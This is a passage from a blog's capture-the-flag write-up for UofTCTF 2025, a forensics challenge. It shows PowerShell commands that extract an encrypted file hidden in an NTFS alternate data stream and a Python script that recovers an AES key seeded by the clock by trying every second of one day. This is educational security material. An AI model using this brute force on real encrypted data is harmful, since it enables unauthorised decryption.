240w,\n/static/68c790819b9c00f0b637596b4bcd101f/d3be9/image-20250112214205715.webp 480w,\n/static/68c790819b9c00f0b637596b4bcd101f/6749f/image-20250112214205715.webp 878w\"\n              sizes=\"(max-width: 878px) 100vw, 878px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/68c790819b9c00f0b637596b4bcd101f/8ff5a/image-20250112214205715.png 240w,\n/static/68c790819b9c00f0b637596b4bcd101f/e85cb/image-20250112214205715.png 480w,\n/static/68c790819b9c00f0b637596b4bcd101f/94829/image-20250112214205715.png 878w\"\n            sizes=\"(max-width: 878px) 100vw, 878px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/68c790819b9c00f0b637596b4bcd101f/94829/image-20250112214205715.png\"\n            alt=\"image-20250112214205715\"\n            title=\"image-20250112214205715\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>With this, I was able to decompress the encrypted RAR file and extract a file called flag.py.</p>\n<p>This flag.py appears to encrypt the flag with AES and save it as flag.enc.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Cipher <span class=\"token keyword\">import</span> AES\n<span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Util<span class=\"token punctuation\">.</span>Padding <span class=\"token keyword\">import</span> pad\n<span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Hash <span class=\"token keyword\">import</span> SHA256\n<span class=\"token keyword\">from</span> time <span class=\"token keyword\">import</span> time\n<span class=\"token keyword\">import</span> random\nrandom<span class=\"token punctuation\">.</span>seed<span class=\"token punctuation\">(</span><span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>time<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\nKEY <span class=\"token operator\">=</span> SHA256<span class=\"token punctuation\">.</span>new<span class=\"token punctuation\">(</span><span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span>random<span class=\"token punctuation\">.</span>getrandbits<span class=\"token punctuation\">(</span><span class=\"token number\">256</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>digest<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nFLAG <span class=\"token operator\">=</span> <span class=\"token string\">\"uoftctf{fake_flag}\"</span>\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">encrypt_flag</span><span class=\"token punctuation\">(</span>flag<span class=\"token punctuation\">,</span> key<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    cipher <span class=\"token operator\">=</span> AES<span class=\"token punctuation\">.</span>new<span class=\"token punctuation\">(</span>key<span class=\"token punctuation\">,</span> AES<span class=\"token punctuation\">.</span>MODE_EAX<span class=\"token punctuation\">)</span>\n    ciphertext<span class=\"token punctuation\">,</span> tag <span class=\"token operator\">=</span> cipher<span class=\"token punctuation\">.</span>encrypt_and_digest<span class=\"token punctuation\">(</span>flag<span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">return</span> cipher<span class=\"token punctuation\">.</span>nonce <span class=\"token operator\">+</span> ciphertext\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    encrypted_flag <span class=\"token operator\">=</span> encrypt_flag<span class=\"token punctuation\">(</span>FLAG<span class=\"token punctuation\">,</span> KEY<span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"flag.enc\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"wb\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n        f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>encrypted_flag<span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">if</span> __name__ <span class=\"token operator\">==</span> <span class=\"token string\">\"__main__\"</span><span class=\"token punctuation\">:</span>\n    main<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>When searching for the flag.enc file that contains the encrypted correct flag, I found that it was stored as an Alternate Data Stream (ADS) of flag.py.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 474px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/124b98823ab9f1edf625b4151490eccf/5595f/image-20250112214145682.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 41.66666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABZ0lEQVQoz41Si07CQBDs//8L32A0FaMokojQo49re3d9AC20pTxiYdw7wJgYEjeZ7O41N53bWYsxhnmeI0tTJIlCmqRQSlGfQUlpkGc5/htWnmfICKnKiDBFURTgAT8TS4X5fIE4jLHZbHA4HLDf702+BavHengMbTzbCWaeRF/EYER4Pxpi+Obgzh5D9W2IwRBO8AopXKzXNcqyIJR/YDkBg0fPnk0c81QeRaQ0geu6iMIQAZF7joPQ5wi5jyxLUVUVVqsVEa9/8hVWUbt4f3rA52iEkAh8zyMyD86USDg3PWMzcB6irhtstzvC1qBtW9Pr3DQNjaWFlYjIqKroQB/qS02zudS1qUs9VyLc7fbGLK0+joWpZw4j1Tm6rjsrDOQCg5c3mo246VzXfUHRGHScTiccjx2RkJG0GdpAKQViIY1hVn9S4GM8pQ8+BP1Vy79e/A2t+HipdWj1y+XSEOtNUbQV2uVvCrdXuBETMfsAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/124b98823ab9f1edf625b4151490eccf/8ac56/image-20250112214145682.webp 240w,\n/static/124b98823ab9f1edf625b4151490eccf/01944/image-20250112214145682.webp 474w\"\n              sizes=\"(max-width: 474px) 100vw, 474px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/124b98823ab9f1edf625b4151490eccf/8ff5a/image-20250112214145682.png 240w,\n/static/124b98823ab9f1edf625b4151490eccf/5595f/image-20250112214145682.png 474w\"\n            sizes=\"(max-width: 474px) 100vw, 474px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/124b98823ab9f1edf625b4151490eccf/5595f/image-20250112214145682.png\"\n            alt=\"image-20250112214145682\"\n            title=\"image-20250112214145682\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I extracted the flag.enc bytes from the ADS using the following commands.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">Set<span class=\"token operator\">-</span>Content C<span class=\"token punctuation\">:</span>\\Users\\kash1064\\Downloads\\flag\\flag<span class=\"token punctuation\">.</span>enc <span class=\"token operator\">-</span>Encoding Byte <span class=\"token operator\">-</span>Value $a\nGet<span class=\"token operator\">-</span>Content C<span class=\"token punctuation\">:</span>\\Users\\kash1064\\Downloads\\flag\\flag<span class=\"token punctuation\">.</span>py<span class=\"token punctuation\">:</span>flag<span class=\"token punctuation\">.</span>enc <span class=\"token operator\">-</span>Encoding Byte <span class=\"token operator\">-</span>ReadCount <span class=\"token number\">0</span></code></pre></div>\n<p>This flag.enc is a concatenation of the 16-byte cipher.nonce and the encrypted ciphertext.</p>\n<p>Furthermore, reading the implementation in flag.py reveals that it uses a key generated with the current time as the seed for encryption.</p>\n<p>From the file timestamps within the archive, we can determine that this file was created on 2025/01/06, which means the encrypted data can likely be decrypted by brute-forcing the seconds.</p>\n<p>Ultimately, I obtained the correct flag with the following script.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Cipher <span class=\"token keyword\">import</span> AES\n<span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Cipher <span class=\"token keyword\">import</span> AES\n<span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Util<span class=\"token punctuation\">.</span>Padding <span class=\"token keyword\">import</span> pad\n<span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Hash <span class=\"token keyword\">import</span> SHA256\n<span class=\"token keyword\">from</span> time <span class=\"token keyword\">import</span> time\n<span class=\"token keyword\">from</span> datetime <span class=\"token keyword\">import</span> datetime\n<span class=\"token keyword\">import</span> random\n\ndata <span class=\"token operator\">=</span> <span class=\"token string\">b\"\\x29\\xe6\\x91\\x01\\xb5\\x00\\xc3\\x83\\x1e\\xff\\x9a\\xfb\\x12\\xc7\\x6b\\x94\\xd4\\xf8\\x81\\x60\\x45\\x83\\x9e\\x60\\xa0\\x61\\x12\\x2e\\x8d\\x01\\xfa\\xf9\\x5e\\x55\\xb1\\x70\\xff\\xd0\\xdc\\xa3\\xdf\\x38\\xc5\\x72\\xf3\\xbd\\xbd\\xe8\\xfb\\xc4\\x4d\\x39\\x38\\xee\\x07\\x86\\xfc\"</span>\nnonce <span class=\"token operator\">=</span> data<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">:</span><span class=\"token number\">16</span><span class=\"token punctuation\">]</span>\nciphertext <span class=\"token operator\">=</span> data<span class=\"token punctuation\">[</span><span class=\"token number\">16</span><span class=\"token punctuation\">:</span><span class=\"token punctuation\">]</span>\n<span class=\"token keyword\">assert</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>nonce<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\n\nbasetime <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>datetime<span class=\"token punctuation\">(</span><span class=\"token number\">2025</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">6</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>timestamp<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span>basetime<span class=\"token punctuation\">,</span> basetime<span class=\"token operator\">+</span><span class=\"token punctuation\">(</span><span class=\"token number\">3600</span><span class=\"token operator\">*</span><span class=\"token number\">24</span><span class=\"token operator\">*</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    random<span class=\"token punctuation\">.</span>seed<span class=\"token punctuation\">(</span>i<span class=\"token punctuation\">)</span>\n    KEY <span class=\"token operator\">=</span> SHA256<span class=\"token punctuation\">.</span>new<span class=\"token punctuation\">(</span><span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span>random<span class=\"token punctuation\">.</span>getrandbits<span class=\"token punctuation\">(</span><span class=\"token number\">256</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>digest<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n    cipher <span class=\"token operator\">=</span> AES<span class=\"token punctuation\">.</span>new<span class=\"token punctuation\">(</span>KEY<span class=\"token punctuation\">,</span> AES<span class=\"token punctuation\">.</span>MODE_EAX<span class=\"token punctuation\">,</span> nonce<span class=\"token operator\">=</span>nonce<span class=\"token punctuation\">)</span>\n    plaintext <span class=\"token operator\">=</span> cipher<span class=\"token punctuation\">.</span>decrypt<span class=\"token punctuation\">(</span>ciphertext<span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">if</span> <span class=\"token builtin\">chr</span><span class=\"token punctuation\">(</span>plaintext<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"u\"</span> <span class=\"token keyword\">and</span> <span class=\"token builtin\">chr</span><span class=\"token punctuation\">(</span>plaintext<span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"o\"</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>plaintext<span class=\"token punctuation\">)</span></code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 830px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/195a2fc3de811a6d211c30b1874bd88b/715a3/image-20250113213639016.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 5.416666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAYAAADeko4lAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAT0lEQVQI1w3GyQ5AMBRAUasmgmj7zGpsTRHx/193OasTuVDg3xb/dIyhZVh2Rn/Sz4Fpu/4frMeNNI44syS6JDU1udRUVYm1Bm00IoJSig8lvRnkBQJkgAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/195a2fc3de811a6d211c30b1874bd88b/8ac56/image-20250113213639016.webp 240w,\n/static/195a2fc3de811a6d211c30b1874bd88b/d3be9/image-20250113213639016.webp 480w,\n/static/195a2fc3de811a6d211c30b1874bd88b/b2a51/image-20250113213639016.webp 830w\"\n              sizes=\"(max-width: 830px) 100vw, 830px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/195a2fc3de811a6d211c30b1874bd88b/8ff5a/image-20250113213639016.png 240w,\n/static/195a2fc3de811a6d211c30b1874bd88b/e85cb/image-20250113213639016.png 480w,\n/static/195a2fc3de811a6d211c30b1874bd88b/715a3/image-20250113213639016.png 830w\"\n            sizes=\"(max-width: 830px) 100vw, 830px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/195a2fc3de811a6d211c30b1874bd88b/715a3/image-20250113213639016.png\"\n            alt=\"image-20250113213639016\"\n            title=\"image-20250113213639016\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>","fields":{"slug":"/ctf-uoftctf-2025-en","tagSlugs":["/tag/forensic-en/","/tag/english/"]},"frontmatter":{"date":"2025-01-13","description":"UoT CTF 2025 Writeup","tags":["Forensic (en)","English"],"title":"UoT CTF 2025 Writeup","socialImage":{"publicURL":"/static/84cc1e0e692ca22f3e05e80e5d1959a5/ctf-uoftctf-2025.png"}}}},"pageContext":{"slug":"/ctf-uoftctf-2025-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}